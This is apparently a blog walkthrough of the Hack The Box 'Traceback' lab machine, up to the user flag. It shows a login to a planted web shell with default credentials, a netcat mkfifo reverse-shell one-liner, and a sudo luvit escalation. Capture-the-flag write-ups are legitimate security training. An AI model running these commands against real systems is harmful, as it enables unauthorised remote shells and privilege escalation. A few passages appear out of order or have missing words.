Swafox Blog
  • Home
  • Resources
  • linux
    • Microsoft Office on Linux
    • Vim
    • How to set up an unlimited secure VPN server for 5$/month
  • Exploit Development / BoF
    • Pwntools
    • Buffer Overflows
  • Ethical Hacking & Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • XXE
    • CVE-2020-5902
    • Google XSS
    • Identifying IP via Email
    • OWASP ZAP
    • Server-side request forgery (SSRF)
  • Write-ups
    • TryHackMe - OWASP Top 10 Event
    • TryHackMe - Anthem
    • TryHackMe - Blog
    • TryHackMe - Poster
    • HTB - Traceback: User flag Walkthrough
    • TryHackMe - Tomghost
Powered by GitBook
On this page
  1. Write-ups

HTB - Traceback: User flag Walkthrough

PreviousTryHackMe - PosterNextTryHackMe - Tomghost

Last updated 2 years ago

IP: 10.10.10.181 Link:

Step 1 - OSINT & Reverse shell

Without further ado, let's dive into the box and browse to the port 80.

The website greets us with the following message. Let's take a look at the source code (Ctrl+U).

There's a strange comment laying around! It suggests something about the 'best web shells'. Let's search it up!

A simple web search led us to a collection of web shells, hosted on GitHub. smevk.php appears to exist on our website. 10.10.10.181/smevk.php

The web app greets us with a simple login page. It was pretty easy to guess the credentials -- admin:admin.

The web app consists of many different functions that allow us to interact with the system. The most useful ones appear to be: Command execution & File uploading.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f

Note: and should be changed according to your tun0 IP and nc listener settings.

Step 2 - User.txt

The first thing you want to do after getting a reverse shell - is getting a tty. This can be easily done by running:

python -c 'import pty; pty.spawn("/bin/bash")'

Now, we can see our user account and execute sudo -l to see if we are allowed to execute any sudo commands.

All we need to do is run the luvit command as sysadmin and then append the -e 'os.execute("/bin/bash")' at the end.

sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'

After that, you can easily upgrade your shell again and read the user.txt flag

From here you can rather upload the or execute one in the command prompt. I'll go with the Netcat reverse shell:

Yes, we can! We are allowed to execute luvit as user sysadmin. A given configuration can be used to get a shell as sysadmin.

PHP reverse shell
GTFObin
hackthebox.eu/home/machines/profile/233